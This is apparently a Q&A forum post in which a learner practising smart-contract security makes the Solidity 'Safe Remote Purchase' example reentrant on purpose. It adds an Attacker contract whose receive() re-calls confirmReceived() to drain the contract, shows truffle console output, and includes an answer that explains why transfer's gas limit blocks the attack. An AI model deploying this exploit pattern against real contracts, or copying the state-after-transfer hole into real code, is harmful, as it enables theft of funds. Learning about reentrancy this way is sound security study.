# Reentrancy attack: Safe Remote Purchase

Tags: solidity, truffle, ganache, openzeppelin, reentrant-attacks

Hello everyone i am new to solidity coding, and i want to improve my security skill regarding smart contracts and evm.
In order to accomplish this goal i tried a reentrancy attack on a [simple contract](https://docs.soliditylang.org/en/latest/solidity-by-example.html#safe-remote-purchase).

So i modified the code of the function confirmReceived(), to make it vulnerable to reentrancy.

```
function confirmReceived()
    external
    onlyBuyer
    inState(State.Locked)
{
    emit ItemReceived();

    buyer.transfer(value);

    state = State.Release; // changed the state after transfer on purpose
}
```

Then i deployed the attack contract.

```
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.4;
import "../contracts/Purchase.sol";
contract Attacker {

    Purchase public purchase;

    constructor(address _purchaseaddress) {
        purchase = Purchase(_purchaseaddress);
    }


    function attack () public payable {

        if (address(purchase).balance > 1) {
            purchase.confirmReceived();
        }
    }
    receive() external payable {
            attack();
    }

    function fundPurchase() external payable {
        purchase.confirmPurchase{value: msg.value}();
    }
}
```

Then i migrated everything on the local ganache blockchain, and put the code to work.
However when i try on the truffle console to invoke the attack function, i get a revert from the EVM, without any information of what went wrong.

```
truffle(ganache)> let a = await Attacker.deployed()
undefined
truffle(ganache)> a.fundPurchase({value: web3.utils.toWei('20'), from: '0x4950BbA09D1031e34402Ed2e392B2c715a9Beb23'})
{
  tx: '0x2f6f84b4b2fe36a580ffae1ed4ab134352bda7e6f7963be8e491113a6e8a8d50',
  receipt: {
    transactionHash: '0x2f6f84b4b2fe36a580ffae1ed4ab134352bda7e6f7963be8e491113a6e8a8d50',
    transactionIndex: 0,
    blockNumber: 3,
    blockHash: '0x0f9de1629180488614d37ed1a5b3d26599dca6cd2efd957d3edaf4c539ccb78b',
    from: '0x4950bba09d1031e34402ed2e392b2c715a9beb23',
    to: '0xbf77e92e3a1cd9beb3696d97892bd9d19f96cae8',
    cumulativeGasUsed: 58993,
    gasUsed: 58993,
    contractAddress: null,
    logs: [],
    logsBloom: '0x00000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000000000000200000000000000000000',
    status: true,
    effectiveGasPrice: 3193906734,
    type: '0x2',
    rawLogs: [ [Object] ]
  },
  logs: []
}
truffle(ganache)> a.attack()
Uncaught Error: VM Exception while processing transaction: revert
    at evalmachine.<anonymous>
    at sigintHandlersWrap (node:vm:270:12)
    at Script.runInContext (node:vm:139:14)
    at runScript (C:\Users\Art\AppData\Roaming\nvm\v18.14.2\node_modules\truffle\build\webpack:\packages\core\lib\console.js:505:1)
    at Console.interpret (C:\Users\Art\AppData\Roaming\nvm\v18.14.2\node_modules\truffle\build\webpack:\packages\core\lib\console.js:520:1)
    at bound (node:domain:433:15)
    at REPLServer.runBound [as eval] (node:domain:444:12)
    at REPLServer.onLine (node:repl:902:10)
    at REPLServer.emit (node:events:513:28)
    at REPLServer.emit (node:domain:489:12)
    at REPLServer.[_onLine] [as _onLine] (node:internal/readline/interface:422:12)
    at REPLServer.[_line] [as _line] (node:internal/readline/interface:892:18)
    at REPLServer.[_ttyWrite] [as _ttyWrite] (node:internal/readline/interface:1270:22)
    at REPLServer.self._ttyWrite (node:repl:997:9)
    at ReadStream.onkeypress (node:internal/readline/interface:270:20)
    at ReadStream.emit (node:events:513:28)
    at ReadStream.emit (node:domain:489:12)
    at emitKeys (node:internal/readline/utils:357:14)
    at emitKeys.next (<anonymous>)
    at ReadStream.onData (node:internal/readline/emitKeypressEvents:64:36) {
  code: -32000,
  data: {
    hash: null,
    programCounter: 340,
    result: '0x',
    reason: null,
    message: 'revert'
  },
  reason: undefined,
  hijackedStack: 'Error: VM Exception while processing transaction: revert\n' +
    '    at C:\\Users\\Art\\AppData\\Roaming\\nvm\\v18.14.2\\node_modules\\truffle\\build\\webpack:\\packages\\provider\\wrapper.js:25:1\n' +
    '    at C:\\Users\\Art\\AppData\\Roaming\\nvm\\v18.14.2\\node_modules\\truffle\\build\\webpack:\\packages\\provider\\wrapper.js:165:1\n' +
    '    at C:\\Users\\Art\\AppData\\Roaming\\nvm\\v18.14.2\\node_modules\\truffle\\build\\webpack:\\node_modules\\web3-providers-http\\lib\\index.js:127:1\n' +
    '    at processTicksAndRejections (node:internal/process/task_queues:95:5)'
}
truffle(ganache)>
```

I tried searching for solutions, but i did not find any, except maybe for the fact that the receive() function is asynchronous, but then how would I suppose to do the reeentrancy?

Thanks a lot guys, any help is appreciated.

Comment: Try increasing the transaction gas, the gas used 58993 seems too low. Another thing you could try is to exit if gas is low.

Answer (score 1, accepted):

To send Ether to other contracts, you can use these three methods:

1. transfer (2300 gas, throws an error)
2. send (2300 gas, returns bool)
3. call (forward all gas or set gas, returns bool)

To ensure successful execution, it's recommended to use `call`, as `transfer` and `send` do not allow you to forward gas, causing the execution to stop when most of the gas is used.